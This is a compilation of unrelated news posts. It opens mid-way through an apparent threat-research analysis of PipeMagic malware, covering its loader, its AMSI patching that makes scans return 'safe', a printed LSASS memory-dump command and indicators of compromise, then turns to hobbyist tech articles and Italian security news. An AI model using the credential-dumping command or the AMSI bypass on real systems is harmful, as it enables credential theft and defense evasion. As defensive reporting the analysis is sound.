Setting the read error flag

To manage open files, the file descriptors used are stored in a doubly linked list in global memory.

Loader

This module, found in one of the infections, is responsible for injecting additional payloads into memory and executing them.

At startup, it first creates a pipe named \\.\pipe\test_pipe20.%d, where the format string includes a unique identifier of the process into which the code is injected. Then data from this pipe is read and sent to the command handler in an infinite loop.

The unique command ID is contained in the first four bytes of the data and can have the following possible values:

The payload is an executable file for 64-bit Windows systems. The command handler parses this file and extracts another executable file from its resource section. This extracted file then undergoes all loading procedures – obtaining the addresses of imported functions, relocation, and so on. In this case, to obtain the system method addresses, simple name comparison is used instead of hashing.

The executable is required to export a function called DllRegisterService. After loading, its entry point is called (to initialize internal structures), followed by this function. It provides an interface with the following possible commands:

Injector

This module is also an executable file for 32-bit Windows systems. It is responsible for launching the payload – an executable originally written in C# (.NET).

First, it creates a pipe named \\.\pipe\0104201.%d, where the format string includes a unique identifier of the process in which the module runs.

The sample reads data from the pipe, searching for a .NET application inside it. Interestingly, unlike other modules, reading here occurs once rather than in a separate thread.

Before loading the received application, the module performs another important step. To prevent the payload from being detected by the AMSI interface, the attackers first load a local copy of the amsi library. Then they enable writing into memory region containing the functions AmsiScanString and AmsiScanBuffer and patch them. For example, instead of the original code of the AmsiScanString function, a stub function is placed in memory that always returns 0 (thus marking the file as safe).

After this, the sample loads the mscoree.dll library. Since the attackers do not know the target version of this library, during execution they check the version of the .NET runtime installed on the victim’s machine. The plugin supports versions 4.0.30319 and 2.0.50727. If one of these versions is installed on the device, the payload is launched via the _Assembly interface implemented in mscoree.dll.

Post-exploitation

Once a target machine is compromised, the attackers gain a wide range of opportunities for lateral movement and obtaining account credentials. For example, we found in the telemetry a command executed during one of the infections:
dllhost.exe $system32\dllhost.exe -accepteula -r -ma lsass.exe $appdata\FoMJoEqdWg
The executable dllhost.exe is a part of Windows and does not support command-line flags. Although telemetry data does not allow us to determine exactly how the substitution was carried out, in this case the set of flags is characteristic of the procdump.exe file (ProcDump utility, part of the Sysinternals suite). The attackers use this utility to dump the LSASS process memory into the file specified as the last argument (in this case, $appdata\FoMJoEqdWg).

Later, having the LSASS process memory dump, attackers can extract credentials from the compromised device and, consequently, attempt various lateral movement vectors within the network.

It is worth noting that a Microsoft article about attacks using CVE-2025-29824 mentions exactly the same method of obtaining LSASS memory using the procdump.exe file.

Takeaways

The repeated detection of PipeMagic in attacks on organizations in Saudi Arabia and its appearance in Brazil indicate that the malware remains active and that the attackers continue to develop its functionality. The versions detected in 2025 show improvements over the 2024 version, aimed at persisting in victim systems and moving laterally within internal networks.

In the 2025 attacks, the attackers used the ProcDump tool renamed to dllhost.exe to extract memory from the LSASS process – similar to the method described by Microsoft in the context of exploiting vulnerability CVE-2025-29824. The specifics of this vulnerability were analyzed in detail by BI.ZONE in the second part of our joint research (in Russian).

IoCs

Domains
aaaaabbbbbbb.eastus.cloudapp.azure[.]com

Hashes
5df8ee118c7253c3e27b1e427b56212c metafile.mshi
60988c99fb58d346c9a6492b9f3a67f7 chatgpt.exe
7e6bf818519be0a20dbc9bcb9e5728c6 chatgpt.exe
e3c8480749404a45a61c39d9c3152251 googleupdate.dll
1a119c23e8a71bf70c1e8edf948d5181
bddaf7fae2a7dac37f5120257c7c11ba

Pipe names
\.\pipe\0104201.%d
\\.\pipe\1.<16-byte hexadecimal string>

securelist.com/pipemagic/11727…

Data centers and the electrification of devices that previously ran on fossil fuels is driving increased demand for electricity around the world. China is addressing this with a megaproject that is a new spin on their most famous piece of infrastructure.

At 250 miles long with a generating capacity of 100 GW, the Great Solar Wall will be able to provide enough energy to power Beijing, although the energy will more likely be used to power industrial operations also present in the Kubuqi Desert. NASA states, “The Kubuqi’s sunny weather, flat terrain, and proximity to industrial centers make it a desirable location for solar power generation.” As an added bonus, previous solar installations in China have shown that they can help combat further desertification by locking dunes in place and providing shade for plants to grow.

Engineers must be having fun with the project as they also designed the Guinness World Record holder for the largest image made of solar panels with the Junma Solar Power Station (it’s the horse in the image above). The Great Solar Wall is expected to be completed by 2030 with 5.4 GW already installed in 2024.

Want to try solar yourself on a slightly smaller scale? How about this solar thermal array inspired by the James Webb Telescope or building a solar-powered plane?

hackaday.com/2025/08/18/chinas…

Una vulnerabilità denominata MadeYouReset è stata scoperta in diverse implementazioni HTTP/2. Questa vulnerabilità può essere sfruttata per lanciare potenti attacchi DDoS.

I ricercatori di Imperva , Deepness Lab e dell’Università di Tel Aviv scrivono che la vulnerabilità ha ricevuto l’identificatore primario CVE-2025-8671. Tuttavia, il bug interessa prodotti di vari fornitori, molti dei quali hanno già rilasciato i propri CVE e bollettini di sicurezza: Apache Tomcat (CVE-2025-48989), F5 BIG-IP (CVE-2025-54500), Netty (CVE-2025-55163), Vert.x e Varnish.

È stato inoltre segnalato che le soluzioni di Mozilla, Wind River, Zephyr Project, Google, IBM e Microsoft sono vulnerabili, il che potrebbe esporre i sistemi vulnerabili a rischi in un modo o nell’altro.

“MadeYouReset aggira il limite standard del server di 100 richieste HTTP/2 simultanee per connessione TCP client“, spiegano gli esperti. “Questo limite è progettato per proteggere dagli attacchi DoS limitando il numero di richieste simultanee che un client può inviare. Con MadeYouReset, un aggressore può inviare migliaia di richieste, creando condizioni DoS per utenti legittimi e, in alcune implementazioni, questo può portare a crash e condizioni di memoria insufficiente.”

La vulnerabilità MadeYouReset è simile ai problemi Rapid Reset e Continuation Flood , che sono stati sfruttati in potenti attacchi DDoS zero-day.

Come questi due attacchi, che sfruttano i frame RST_STREAM e CONTINUATION nel protocollo HTTP/2, MadeYouReset si basa su Rapid Reset e aggira la protezione che limita il numero di flussi che un client può annullare tramite RST_STREAM.

L’attacco sfrutta il fatto che il frame RST_STREAM viene utilizzato sia per la cancellazione avviata dal client che per la segnalazione degli errori di flusso. MadeYouReset funziona inviando frame appositamente creati che causano violazioni impreviste del protocollo, costringendo il server a reimpostare il flusso tramite RST_STREAM.

“Affinché MadeYouReset si attivi, un flusso deve iniziare con una richiesta valida su cui il server inizia a lavorare, e poi generare un errore in modo che il server ricorra a RST_STREAM mentre il backend continua a elaborare la risposta“, scrivono i ricercatori. “Creando determinati frame di controllo non validi o interrompendo il protocollo al momento giusto, possiamo forzare il server a utilizzare RST_STREAM su un flusso che conteneva già una richiesta valida.”

Inoltre, Imperva sottolinea che MadeYouReset è mescolato al traffico normale, rendendo tali attacchi difficili da rilevare.

Gli esperti suggeriscono una serie di misure che dovrebbero contribuire a proteggere da MadeYouReset, tra cui l’utilizzo di una convalida del protocollo più rigorosa, l’implementazione di un monitoraggio più rigoroso dello stato del flusso per rifiutare le transizioni non valide, l’implementazione di un controllo della velocità a livello di connessione e l’implementazione di sistemi di rilevamento delle anomalie e di monitoraggio comportamentale.

L'articolo La vulnerabilità MadeYouReset in HTTP/2 può essere sfruttata in DDoS potenti proviene da il blog della sicurezza informatica.

As long as there have been games, there have been crackers breaking their copy protections. “Digital Rights Management” or DRM, is a phrase for copy protection coined near the end of the 1990s, and subverted shortly thereafter. But how? [Nathan Baggs] show us what it took to be a cracker in the year 2000, as the first step to get an old game going again turned out to be cracking it.

The game in question is “Michelin Rally Masters: Race of Champions” by DICE, a studio that was later subsumed by EA and is today best known as the developers of the Battlefield franchise. The game as acquired from an abandonware site does not run in a virtual machine, and after a little de-obfuscation of the code causing the crash, [Nathan] discovers LaserLock is to blame. LaserLock was a DRM tool to lock down a game to its original CD-ROM that dates all the way back to 1995. Counters to LaserLock were probably well-known in the community back in the day, but in 2025, [Nathan] walks us through attempting to crack it it from first principles.

We won’t spoil the whole assembly-poking adventure, but the journey does involve unboxing an original CD to be able to compare what’s happening when the disc is physically present compared to running from the ISO. Its tedious work and can only be partially automated. Because it did prove so involved, [Nathan]’s original aim — getting the game to work in Windows 11 — remains unfulfilled so far.

Perhaps he’d have had better luck if he’d been listening to the appropriate music. Frustrating DRM isn’t always this hard; sometimes all you needed was a paperclip.

youtube.com/embed/D8VZdHS51cU?…

hackaday.com/2025/08/17/cracki…

An adult human can produce about 100 Wh of mechanical power whilst cycling, which is a not inconsiderable amount if you can convert that to electricity with reasonable efficiency. In a recent article on EDN [T. K. Hareendran] goes over a few ways that you can turn the rotary motion of pedaling into usable electrical power.
Suggested voltage regulator for pedal-powered generator. (Credit: T. K. Hareendran, EDN)
A basic form of this is already widely deployed, in the form of a bicycle dynamo that is used to supply power to the front and rear lights. These typically put out something like 3 watts at 6 VAC, so with a simple bridge rectifier and some smoothing this can power a pretty bright LED or two. To get more out of it, you need to use a more capable generator, which can also be a brushed or brushless DC motor in a pinch, with ideally a flywheel in the whole contraption to balance out variations in the human power input.

As for the potential here, a commercial solution like the K-Tor Power Box 50 is specified for ‘greater than’ 50 Watt, with a nominal 12 VDC output. Its target market is emergency generators, with enough capability to keep phones, radios and flashlights charged. Considering the $435 asking price, there is probably quite a lot of DIY potential well within that price bracket, especially if you already have many of the requisite parts lying around.

Fortunately this is not a new idea, with us having covered using bicycles as well as gym equipment to generate electricity in the past.

hackaday.com/2025/08/17/practi…

We’ve studiously avoided any mention of our latest interstellar visitor, 3I/Atlas, on these pages, mainly because of all the hoopla in the popular press about how Avi Loeb thinks it’s aliens, because of course he does. And we’re not saying it’s aliens either, mainly because we’d never be lucky enough to be alive during an actual alien invasion — life just hasn’t historically been that kind to us. So chances are overwhelming that 3I/Atlas is just a comet, but man, it’s doing its level best to look like it’s not, which means it’s time to brave the slings and arrows and wade into this subject.

The number of oddities surrounding 3I/Atlas just keeps growing, from its weird Sun-directed particle stream to its extreme speed, not to mention a trajectory through the solar system that puts it just a fraction of an astronomical unit from two of the three planets within the “Goldilocks Zone” of our star — ignore the fact that at an estimated seven billion years old, 3I/Atlas likely would have started its interstellar journey well before our solar system had even started forming. Still, it’s the trajectory that intrigues us, especially the fact that it’s coming in at a very shallow along to the ecliptic, and seems like it will cross that imaginary plane almost exactly when it makes its closest approach to the Sun on October 29, which just coincidentally happens to be at the very moment Earth is exactly on the opposite side of our star. We’ll be as far as possible from the action on that date, with the comet conveniently lost in the glare of the Sun. Yes, there’s talk of re-tasking some of our spacecraft around Mars or in the Jovian system to take a peek when 3I/Atlas passes through their neighborhoods, but those are complicated affairs that show no sign of bearing fruit in the short time left before the comet heads back out into the Deep Dark. Too bad; we’d really love an up-close and personal look at this thing.

Starbucks campers, beware — the company would really prefer you don’t set up a full office in their stores. At least in South Korea, that is, where patrons have taken things to extremes by bringing full-sized desktop computers and even printers to the cozy confines of their local Starbucks. The company is fighting back against the practice in the most generic way possible, implementing a policy that bans patrons from bringing “bulky items” with them when the caffeine urge strikes. Mind you, we’ve done plenty of work out in the wild. Nearly the whole first year of Hackaday articles from this particular author were written on a humble Chromebook inside either a Starbucks or a Dunkin’ — with heavy emphasis on the latter because of their vastly superior hot cocoa. So we get the new rule, but it almost seems like Starbucks is missing an opportunity here. Why don’t they just lean into it and install a metered printer in each store?

This story gave us a bit of pause when we first read it, and we’re not sure if this is a case of technical ignorance on the part of the UK government, or us. Guidance published this week by the Department for Environment, Food, and Rural Affairs asks UK citizens to delete old emails and images from cloud-based services due to the current “nationally significant” drought conditions. Apparently, this will save water somehow, presumably by reducing the cooling load on the data centers that house these files. If you’re confused by this, we are too; do the policy wonks think that the hard drives that store these files are water-cooled? Or perhaps that keeping those pictures from 2013 requires some CPU cycles, therefore generating heat that has to be removed? We suppose that’s possible, and that removing the temptation to gaze at photos from Aunt Winifred’s 99th birthday party would spare a few drops of water, but then again, it was our impression that data centers aren’t just running cold water from the taps through their cooling units, but rather running closed-loop systems that consume as little fresh water as possible. We’re willing to be proven wrong, of course — data center cooling actually sounds like great fodder for an article — but on the face of it, this sounds like a government agency throwing something against the wall and seeing if it sticks.

We can’t say why for sure, but the idea of continental divides is unreasonably cool to us. Here in the US, we’ve got a couple of these imaginary geographic lines, the main one being the Atlantic-Pacific divide that roughly transects the continent north to south along the ridges and peaks of the Rocky Mountains. East of the line, water eventually flows into the Atlantic basin, while west of the line, rivers all flow into the Pacific. It’s a fascinating concept, one that’s captured beautifully by River Runner Global, an interactive GIS application that lets you trace the path of a virtual drop of water on its journey to the sea. It charts the rivers and streams of your drop’s journey, and the best part is the flyover of the terrain as it courses to the sea. Fair warning, it’s pretty resource hungry; it locked up our machine once while playing. But it’s worth the risk, in our opinion.

And finally, it’s factory tour time again here at Hackaday Links, and this time we’ve got a real treat: a full tour of Toyota Motors Manufacturing Texas, the San Antonio mega-plant that makes Tundra pickups and Sequoia SUVs. The factory produces one new vehicle every 67 seconds, starting from raw steel coil stock. The enormity of the presses used to stamp out body panels alone is worth the price of admission, as is the part where the entire body goes for a deep soak in a galvanizing tank to protect the metal. The level of automation is astounding, but it was surprising to see just how many people are still critical to the process. And extra points for the sneak-peek at the new Tundra color near the end. We’re not a fan, but it certainly does make a statement. Enjoy!

youtube.com/embed/En0Ft5GY-DU?…

hackaday.com/2025/08/17/hackad…

Candle clocks were once an easy way to build a clock without using complex mechanical devices: just observe how quickly a thin candle burns down, mark an identical candle with periodic gradations, and you had a simple timer. These were the first candle-based timekeeping devices, but as [Tim]’s flicker-based oscillator demonstrates, they’re certainly not the only way to keep time with a flame.

Generally speaking, modern candles minimize flickering by using a wick that’s designed to balance the amount of wax and air drawn into the flame. However, when several candles are brought close together, their flames begin to interfere with each other, causing them to flicker in synchrony. The frequency of flickering is a function of gravity and flame diameter alone, so a bundle of three candles will flicker at a fairly constant frequency; in [Tim]’s case, it was about 9.9 Hz.

To sense this oscillation, [Tim] originally used a phototransistor to detect the flame’s light, but he wanted an even simpler solution. He positioned a wire just above the flame, so that as it flickered it would periodically contact the wire. A flame has a different dielectric constant than air does, so the capacitance between this and another wire wrapped around the bundle of candles fluctuates with the flame. To sense this, he used a CH32V003 microcontroller, which reads capacitance, performs some signal processing to get a clean signal, counts oscillations, and uses this time signal to blink an LED once a second. The final result is unusually mesmerizing for a blinking LED.

In something of the reverse of this project, we’ve also seen an oscillator used for an (artificial) candle. There’s also a surprising amount of science that can be learned by studying candles.

youtube.com/embed/nNFMftN1w9s?…

hackaday.com/2025/08/17/2025-o…

There’s long been a push to stop writing code as a sequence of lines and go to something graphical, which has been very successful in some areas and less so in others. But even when you use something graphical like Scratch, it is really standing in for lines of code? Many graphical environments are really just interface builders, and you still write traditional code underneath. [Masato Hagiwara] asks the question: Can you write code that is actually a 2D graphic? Where the graphical layout isn’t a cover for code, but is the code itself? His answer is Recto.

Whereas a C program, for example, has a syntactical structure of lines, a Recto program has rectangles. Rectangles can contain data, and their structure naturally mimics the kinds of structures we usually use: columns, rows, matrices, and so on. Rectangles can also contain… wait for it… other rectangles. Special rectangles act as dictionaries or sets.

We thought this sort of reminded us of Lisp, and, in fact, [Hagiwara] makes that clear later in the post. The real problem is how do you…write? draw?… this kind of code? At first, he laid it out in a spreadsheet before compilation. Now he’s built an editor for it, and you can try it in your browser. There’s also a limited-feature compiler that can handle simple programs.

[Hagiwara] goes on to show how this representation would work for natural human languages, too. Honestly, we have enough trouble with English and the few other human languages we struggle with, but it is interesting to contemplate.

If you like strange languages, there’s Piet. Not that either of these is the weirdest we’ve ever seen.

hackaday.com/2025/08/17/recto-…

Organic Llamas have a rather restricted range, in nature: the Andes Mountains, and that’s it. Humans weren’t content to let the fluffy, friend-shaped creatures stay in their natural habitat, however, and they can now be found on every continent except Antarctica. The Llama2 Large Language Model is like that: while it may have started on a GPU somewhere, thanks to enterprising hackers like [Caio Madeira], who has ported Llama2 to the PlayStation Portable (PSP), the fluffiest LLM can be found just about anywhere.
The AI, in all its glory, dooming yet another system.
Ultimately this project has its roots in Llama2.c by [karpathy], a project we’ve seen used on Pentium II under Windows 98, DOS machines running 486 processors, and even the venerable Commodore 64, of all impossible things. Now, it’s the PSP’s turn. This implementation uses the same 260K tinystories model as the C64 port, upon which it is based. Of course the PSP’s RAM has room for a much larger model, but [Ciao] apparently prefers to run the tiny model faster on this less-ancient gaming hardware.

Its getting to the point that it’s harder to find systems that won’t run LLMs than those that do. Given that Llama2 seems to be the new DOOM, it’s probably only a matter of time before their virtual fur is all over all our old equipment. Fortunately for allergy sufferers, virtual fur cannot trigger a histamine response.

If you know of another system getting LLMs (Alpaca-adjacent or otherwise), send in a tip.

hackaday.com/2025/08/17/llama-…

When is a Raspberry Pi not a Raspberry Pi? Perhaps when it’s a Pi Zero-shaped board with an RP3A0 SoC from a Raspberry Pi Zero 2, made by [jonny12375].

Back in the early days of the Raspberry Pi, there was a offering from the Korean manufacturer Odroid, which wasn’t merely a similar machine with a different SoC, but a full clone in a smaller form factor featuring the same BCM2385 chip as the original. It was electrically and software-wise identically to the real thing, which we suspect didn’t go down very well with the Pi folks in Cambridge. The supply of Broadcom chips dried up, and ever since then the only way to get a real Pi has been from the official source. That’s not quite the end of the unofficial Pi story though, because a few hardy experimenters have made Pi clones like this one using chips desoldered from the real thing.

It’s the fruit of a reverse-engineering project to find the chip’s pinout, and it’s a proof of concept board rather than the intended final target of the work. The process involved painstakingly sanding down each layer of a Zero 2 board to reveal the traces and vias. The current board has a few quirks but it boots, making this an impressive piece of work on all counts. We’re looking forward to seeing whatever the final project will be.

If you’re hungry for more Pi-derived goodness, we’ve also seen one using the part form a Pi 3.

hackaday.com/2025/08/17/its-a-…

It’s hard to argue with nostalgia, but you can toss a bucket of cold facts over it. In the case of the recent rescuing of the Commodore brand from the clutches of relabeling of generic electronics by [Perifractic] of Retro Recipes, we got [The Retro Shack] doing the proverbial bucket dumping in a new video. Basically the question is whether the fresh Commodore 64 offerings by the new-and-improved Commodore are what you really want, or need.

The thing is that over the decades many people have created all the bits that you need to build your own classical C64, or even buy one off-the-shelf, with people like [bwack] having reverse-engineered the various C64 mainboards. These can be populated with drop-in replacements for chips like the SID, VIC-II, CIAs and others that are readily available, along with replica cases and keyboards. If you crave something less bulky and complex you can run a bare metal C64 emulator like BMC64 on a Raspberry Pi, or just run the VICE emulator on your platform of choice. There’re also options like the full-sized TheC64 and Ultimate 64 Elite II systems that you can buy ready to go.

Basically, there is a whole gamut of ways to get some part of the C64 experience, ranging from emulator-only to a full hardware DIY or pre-assembled format. Each of which come with their own price tag, starting at $0 for running VICE on your existing system. With so much choice we can only hope that the renewed Commodore company will become something more than Yet Another C64 Experience.

youtube.com/embed/qz8EzWTb4so?…

hackaday.com/2025/08/17/commod…

Negli ultimi anni Microsoft Teams è diventato uno degli strumenti di collaborazione più diffusi all’interno delle aziende, trasformandosi in un canale strategico non solo per la comunicazione, ma anche per la gestione di documenti, meeting e processi operativi.

Questa crescente centralità, tuttavia, non è passata inosservata ai criminali informatici, che stanno sviluppando tecniche sempre più sofisticate di attacco e ingegneria sociale proprio su questa piattaforma, con l’obiettivo di infiltrarsi nelle reti aziendali e sottrarre informazioni sensibili. La combinazione tra fiducia implicita nello strumento e l’elevato volume di comunicazioni quotidiane crea infatti un terreno fertile per campagne mirate di compromissione.

Un esempio emblematico è l’operazione di ingegneria sociale d’avanguardia orchestrata dal gruppo malintenzionato EncryptHub, che ha messo in campo una strategia perversa capace di fondere tecniche di spoofing con exploit tecnici mirati. Come anticipato nell’analisi di ieri, si tratta di una campagna avanzata che sfrutta congiuntamente tattiche di impersonificazione e vettori di attacco informatici, riuscendo così a compromettere in maniera significativa la sicurezza delle infrastrutture aziendali.

Questo nuovo approccio, impersonando gli addetti IT, dimostra come i confini tra ingegneria sociale e attacchi tecnici si stiano assottigliando, aprendo scenari sempre più complessi per la difesa cyber.

L’attacco inizia con gli autori della minaccia che affermano di appartenere a reparti IT interni e inviano richieste di connessione a Microsoft Teams ai dipendenti presi di mira.

Una volta che le vittime accettano la richiesta e stabiliscono una sessione remota, gli aggressori le guidano nell’esecuzione di comandi PowerShell che sembrano legittimi ma in realtà scaricano ed eseguono script dannosi.

Il comando iniziale eseguito ignora i criteri di sicurezza di Windows e scarica uno script di PowerShell denominato “runner.ps1” dai domini controllati dagli aggressori, come cjhsbam[.]com.

Questo script è progettato per sfruttare il CVE-2025-26633 una vulnerabilità nel framework Management Console di Microsoft denominata “MSC EvilTwin”.

La vulnerabilità CVE-2025-26633 è stata ufficialmente rivelata come vulnerabilità zero-day a marzo 2025, sebbene esempi di attacchi correlati siano stati osservati in circolazione già nel febbraio 2025. Da allora Microsoft ha rilasciato patch di sicurezza, ma la vulnerabilità continua a essere sfruttata attivamente contro sistemi privi di patch.

La vulnerabilità ha un punteggio CVSS di 7,0, che indica un’elevata gravità, ed è stata aggiunta al catalogo delle vulnerabilità note sfruttate del CISA, sottolineandone la natura critica per le agenzie federali e gli ambienti aziendali.

La campagna evidenzia la persistente efficacia degli attacchi di ingegneria sociale combinati con lo sfruttamento tecnico. “L’ingegneria sociale rimane uno degli strumenti più efficaci nell’arsenale di un criminale informatico e il gruppo emergente EncryptHub si è subito unito a questa tendenza“, hanno osservato i ricercatori di Trustwave.

Gli esperti di sicurezza informatica raccomandano di implementare strategie di difesa multilivello, tra cui l’immediata correzione di CVE-2025-26633, un monitoraggio avanzato delle attività di Microsoft Management Console e una formazione completa sulla consapevolezza degli utenti incentrata sulle tattiche di ingegneria sociale.

Le organizzazioni dovrebbero inoltre limitare le capacità di accesso remoto e implementare rigide procedure di verifica per le interazioni con il supporto IT.

L'articolo Microsoft Teams sempre più Nel Mirino. EncryptHub compromette reti aziendali con malware proviene da il blog della sicurezza informatica.

Lately, this peculiar little single wheel monorail came to our attention. Built by [extraglide1976], all from Meccano. His build started with modest tests: one gyro obviously flopped. Two gyros geared together ran slightly better. But when he adds active gimbal control, things suddenly come to life – the model shudders, catches itself, and carries on. The final green-roofed locomotive, with LEDs signalling ‘system go’, trundles smoothly along a single rail on [extraglide1976]’s deck.

To be fair, it houses a lot of mechanics and engineering which we don’t find in the monorails of today. We do have quite a few monorails in our world, but none of them balance on a single wheel like this one. So, where did this invention derail?

Outside of theme parks, Japan is one of the few countries where monorails are still used as serious urban transport: though Germany’s century-old Wuppertal Schwebebahn, the lesser-known C-Bahn, China’s sprawling Chongqing and Shanghai systems, Malaysia’s Kuala Lumpur line, Brazil’s São Paulo network, the US links in Seattle and Las Vegas, and India’s Mumbai Monorail prove the idea has quietly taken root elsewhere.

The thing you’ll see in nearly all these monorails is how the carriages are designed to clamp onto the tracks. This is of course the most safe option, but it loses out on speed to the ones that sit on top of the tracks, balancing on one wheel. Such a train was actually invented, in 1910, by Louis Brennan. His original monorail promised faster, cheaper transport, even using existing rails. The carriages leaned into turns like a motorbike, without any intervention from the driver. Two counter-rotating gyroscopes kept the carriage upright, cancelling precession forces like a mechanical Jedi trick.

Back then, it failed commercially, but today? With cheap sensors, brushless motors, and microcontrollers, and intelligent software, why not let it make a comeback? It could carry freight through narrow urban tunnels. With high-speed single-rail pods?

Investors killed Brennan’s idea, but we live in a different time now. You could start out with a gimmicky ‘snacks and beer’ highline from your fridge to your garage. Share your take on it in the comments!

youtube.com/embed/AYsdJt8CIVE?…

hackaday.com/2025/08/16/a-seco…

Some people like their homelabs to be as big and fancy as possible, with racks of new or surplus server hardware sucking down power. [Hardware Haven] evidently has the opposite idea, given he just made a video about making the cheapest, smallest server possible: an Android phone.

Sure, it’s not going to be streaming terabytes of data at multiple gigabytes per second, but that’s not everyone’s use case. Don’t forget, flagship phones had multiple cores and gigabytes of RAM a decade ago, so even an old and busted smartphone has more than enough power for something like Home Assistant, which is what gets installed in this video.

After considering loading termux and rooting his device for Docker-on-Android, he opted for postmarketOS, the premiere Linux for old smartphones. That’s not because the Linux environment you get with termux wouldn’t work; it’s just that he wanted something native. To that end, he bought a somewhat worse-for-wear Xiaomi Mi A1 from eBay to get hardware Alpine-based postmarket could use.

Software wise, it was just a matter of following instructions and reading manuals — Linux is Linux, after all. The firewall proved to be his main challenge, though trying to branch out from Home Assistant to run Minecraft Server did run into Java issues [Hardware Haven] had no interest in troubleshooting. Hardware wise, though, well — do you want to leave a phone plugged in permanently? Smokey the Bear suggests you not, especially if you live near a forest. Besides, you probably don’t want your server on WiFi, and at least this smartphone wouldn’t charge when using a networking dongle.

That meant phone surgery: the battery came out, and 5 V from an old USB charger was piped into the battery charge controller via a diode. The diode was used for its voltage drop, to bring the 5 V supply down to a believable battery voltage — a buck converter might have been better, but you use what you have, and the diode drop doesn’t dissipate much power. Power dissipation is still one watt at idle, six during a stress test.

Given how cheap the phone was, and how little power this thing sips, [Hardware Heaven] has an excellent answer to those who say homelabbing is a rich person’s hobby. This project also reminds us that while our phones might not be as hackable as we’d like, they’re still far from totally locked down. You can even run NixOS on (some of) them.

youtube.com/embed/OBOoDffWF0Y?…

hackaday.com/2025/08/16/from-s…

In FDM 3D printing cycles TPU is a bit of a special filament. Not so much because of its properties, but because it’s rather stretchy even as a filament, which makes especially printing certain hardness grades of TPU into somewhat of an nightmare. An interesting new contender here comes from a company called BIQU, who reckon that their ‘MorPhlex’ TPU solves many of those problems. Recently the [ModBot] channel on YouTube got sent a spool of the filament for testing.
The BIQU MorPhlex TPU filament being turned into squishy slippers. (Credit: ModBot, YouTube)
The ‘magic’ here is that this TPU claims to be a 90A TPU grade while on the spool, but after printing it becomes 75A, meaning a lot softer and squishier. Perhaps unsurprisingly, a big selling point on their product page is that you can print squishy shoes with it. Beyond this is claims to be compatible with ‘most FDM printers’, and the listed printing parameters are typical for TPU in terms of extruder and bed temperature.

After drying the filament as recommended for TPU in general, test prints were printed on a Bambu Lab H2D. Here BIQU recommends not using the AMS, but rather the dedicated TPU feeding channel. For the test prints some slippers were printed over the course of two days. In hindsight glue stick should have been applied to make parts removal easier.

The slippers were indeed squishy, but the real test came in the form of a Shore A hardness meter and some test cube prints. This showed an 80 – 85A for the BIQU MorPhlex test cube depending on whether to test the side or top. As the product datasheet indicates a final hardness of 75A +/- 3A, one could argue that it’s kind-of in spec, but it mostly raises questions on how parameters like temperature and extrusion speed affect the final result.

youtube.com/embed/gC49WgtZfnI?…

hackaday.com/2025/08/16/morphl…

Many of us have run a Blink program on a microcontroller before. It’s effectively the “Hello, World!” of the embedded space. However, few of us have ever thought about optimizing our Blink code to be as miniscule as possible. But that’s precisely what [Rudra Lad] did for this entry into the 2025 One Hertz Challenge!

This example of Blink, delay_blinky_13, is built specifically for the STM32F4 Discovery microcontroller development board. [Rudra] notes the code is “highly optimized” and compiles down to a binary size of under 50 bytes. The code doesn’t even use RAM, and it aims to get the blink as close to 1 Hz as possible. Many optimizations were used to crunch it down as small as possible. For example, the standard startup code isn’t used, with the entire program instead written in the Reset_Handler to save space. Bit-band is also used to write to peripheral registers to blink the LED, since this uses less instructions than the typical methods. Meanwhile, with many tweaks to the delay counting routine, [Rudra] was eventually able to get the blink frequency to 1.00019 Hz, as measured on a logic analyzer. That’s pretty darn close!

While it’s rare that you have only 50 bytes of binary space to blink an LED, work like this is a great way to flex your coding muscles. Code is on Github for the curious, and if you’ve worked up your own impressive tiny binaries, don’t hesitate to let us know!

hackaday.com/2025/08/16/2025-o…

The late 1970s were an interesting time for microcomputers. The rousing success of things like the 8080, the Z80, the 6800, and the 6502 made everyone wanted a piece of the action. National Semiconductor produced its SC/MP. That was technically the Simple Cost-effective Micro Processor, but it was commonly known as Scamp. There were several low-cost development boards built around this processor and [Hello World] is looking at Digikey’s “Nibbler” which was a fairly nice computer for only $150. Check it out in the video below.

The SC/MP was made to be cheap. It had a strange bank switching scheme reminiscent of the Microchip PIC 16F family. It also had, like a lot of old discrete computers, a serial ALU, which made it slower than many of its contemporaries. It did have good features, though. It was cheap and required very few extra parts along with a single 5 V supply in the second and subsequent versions. In addition, it had pins that were made for connecting more than one CPU, which was quite a feat for those days.

[Hello World] mentions that you don’t hear much about the SC/MP anymore and, in fact, we had all but forgotten about it. There is an effort underway to recreate the plucky little computer for anyone who wants to build a new one.

The $150 price tag seems reasonable, at least compared to other computers of the day. However, don’t forget that you still need a power supply, probably a card cage, and the biggest problem of all: a terminal. It is hard to remember how difficult it used to be to get your hands on a terminal at a reasonable cost. Your main choices were a TV typewriter or something surplus like a TeleType.

youtube.com/embed/Sbxy7Ob3hkI?…

youtube.com/embed/wK-WTeWHFic?…

hackaday.com/2025/08/16/the-ni…

Al Williams wrote up a seemingly innocent piece on a couple of rules-of-thumb to go between metric and US traditional units, and the comment section went wild! Nothing seems to rile up the Hackaday comment section like the choice of what base to use for your unit system. I mean, an idealized version of probably an ancient Egyptian’s foot versus a fraction of the not-quite-right distance from the North Pole to the equator as it passes through Paris? Six of one, half a dozen the other, as far as I’m concerned. Both are arbitrary.

What’s fun, though, is how many of us need to know both systems and how schizophrenic it all can be. My favorite example is PCB layout, where tenths and thousandths of an inch are unavoidable in through-hole and surface-mount parts, yet we call out board sizes and drill bits in millimeters – on the same object, and without batting an eye. American 3D printer enthusiasts will know their M3 hardware, and probably even how much a kilogram weighs, because that’s what you buy spools of filament in. Oddly enough, though I live in Europe, I have 3/4” thread on my garden hose and a 29” monitor on my desk. Americans buy two liter bottles of soda without thinking twice.

The absolute kings of this are in the UK, where the distance between cities is measured in miles, but the dimensions of an apartment in meters. They’ll buy gas in liters and beer in pints. Humans are measured both in feet-and-inches and centimeters, and weighed in pounds, kilograms, or even stone.

And I think that’s just fine. Once you give up on the rightness of either system, they both have their pros and cons. Millimeters are superb for doing carpentry in – that’s just about how tight my tolerances are with hand tools anyway, and if it’s made of wood, you can fudge 0.5 mm either way pretty easily. Sure, you could measure in 32nds of an inch, but have you ever bought a plywood sheet that’s 1536 x 3072 thirty-seconds? (That’s 4’ x 8’, or 1200 mm x 2400 mm.) No, you haven’t.

But maybe stick to one system when lives or critical systems are on the line. Or at least be very careful to call out your units. While it’s annoying to spec the wrong SMT part size because KiCAD calls some of them out in millimeters and inches – 0402 in inches is tiny, but 0402 in metric is microscopic – it’s another thing entirely to load up half as much fuel as you need for a commercial airline flight because of metric vs imperial tons. There’s a limit to how units-flexible you want to be.

